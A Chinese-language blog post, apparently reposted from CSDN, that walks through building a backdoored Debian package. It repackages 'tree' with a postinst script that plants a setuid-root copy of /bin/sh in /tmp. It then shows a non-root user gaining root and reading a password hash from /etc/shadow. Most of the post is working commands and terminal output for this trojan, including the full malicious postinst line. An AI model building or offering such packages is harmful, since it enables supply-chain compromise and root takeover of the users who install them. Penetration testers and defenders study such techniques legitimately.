首页 > 其他 > 详细

create a backdoor deb package

时间:2014-08-26 19:45:26      阅读:326      评论:0      收藏:0      [点我收藏+]

下面介绍如何制作包含后门的deb安装包,以tree为例进行说明。利用apt-get下载安装包,--download-only表示只下载不做其他处理。

root@deb:~#apt-get download --download-only tree

Get:1Downloading tree 1.6.0-1 [43.3 kB]

Fetched43.3 kB in 2s (21.4 kB/s)

root@deb:~#ls -l

total44

-rw-r--r--1 root root 43314 Feb 4 2012 tree_1.6.0-1_amd64.deb


解压deb安装包,并创建目录DEBIAN(大写),在DEBIAN目录下创建文件controlpostinst

Control,包含deb包说明信息,例如:包名,版本号,平台,作者等。

Postinst,完成Debian包文件解包文件的配置工作。通常,“postinst”脚本等待用户输入,或提醒用户,如果他接受当前默认值,要记得软件包安装完后返回重新配置。许多“postinst”脚本负责执行有关命令为新安装或升级的软件重启服务。

root@deb:~#dpkg -x tree_1.6.0-1_amd64.deb tree_1.6.0-1_amd64

root@deb:~#mkdir ./tree_1.6.0-1_amd64/DEBIAN

root@deb:~#cd ./tree_1.6.0-1_amd64/DEBIAN/

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#touch control postinst


Control内容,可来源于dpkg–info /path/to/debfile

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg --info /root/tree_1.6.0-1_amd64.deb

newdebian package, version 2.0.

size43314 bytes: control archive=664 bytes.

393bytes, 12 lines control

433bytes, 7 lines md5sums

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color

Displaysan indented directory tree, using the same color assignments as

ls,via the LS_COLORS environment variable.

最终control文件内容如下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat control

Package:tree

Version:1.6.0-1

Architecture:amd64

Maintainer:Florian Ernst <florian@debian.org>

Installed-Size:109

Depends:libc6 (>= 2.3)

Section:utils

Priority:optional

Homepage:http://mama.indstate.edu/users/ice/tree/

Description:displays directory tree, in color Displays an indented directorytree, using the same color assignments as ls, via the LS_COLORSenvironment variable.


最终postinst脚本内容如下:

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#cat postinst

#!/bin/bash


sudo cp /bin/sh /tmp/rootshell && sudo chown root:root/tmp/rootshell && sudo chmod 4755 /tmp/rootshell

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#chmod 755 postinst


所有配置文件准备完成后,使用dpkg-deb打包,成功创建包含后门的安装包tree_1.6.0-1_amd64.deb.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total4

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg-deb --build /root/tree_1.6.0-1_amd64/

dpkg-deb:building package `tree‘ in `/root/tree_1.6.0-1_amd64.deb‘.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /root/

total48

drwxr-xr-x4 root root 4096 Aug 26 06:17 tree_1.6.0-1_amd64

-rw-r--r--1 root root 43156 Aug 26 06:28 tree_1.6.0-1_amd64.deb


安装后门deb包,创建/tmp/rootshell文件.

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total20

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#dpkg -i /root/tree_1.6.0-1_amd64.deb

Selectingpreviously unselected package tree.

(Readingdatabase ... 130311 files and directories currently installed.)

Unpackingtree (from /root/tree_1.6.0-1_amd64.deb) ...

Settingup tree (1.6.0-1) ...

Processingtriggers for man-db ...

root@deb:~/tree_1.6.0-1_amd64/DEBIAN#ls -l /tmp/

total128

drwx------2 docker docker 4096 Aug 26 05:15 pulse-bmNZfTJ6gWCq

drwx------2 root root 4096 Aug 26 05:14 pulse-PKdhtXMmr18n

drwx------2 Debian-gdm Debian-gdm 4096 Aug 26 05:15 pulse-ZvmMH2Gn4QZR

-rwsr-xr-x1 root root 106920 Aug 26 06:29 rootshell

drwx------2 docker docker 4096 Aug 26 05:15 ssh-qkrUkg0Dfu9v

drwxr-xr-x2 docker docker 4096 Aug 26 05:15 tracker-docker


运行后门

docker@deb:/root/tree_1.6.0-1_amd64/DEBIAN$/tmp/rootshell

#id

uid=1000(docker)gid=1000(docker) euid=0(root)groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),105(scanner),110(bluetooth),112(netdev),1000(docker)

#head -1 /etc/shadow

root:$6$GiCLTee$AEFGgQdvK2LG3m7gtD6.HG39rIrkhh48P..234Xs3DFuxUJ/B7jfJO5mJryPCRmeW1sGHvgf6GT77ztJ.PHO31:16302:0:99999:7:::

#



参考链接:

http://pastebin.com/m5XULth7#
http://www.offensive-security.com/metasploit-unleashed/Binary_Linux_Trojan

create a backdoor deb package

原文:http://blog.csdn.net/nixawk/article/details/38850993

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!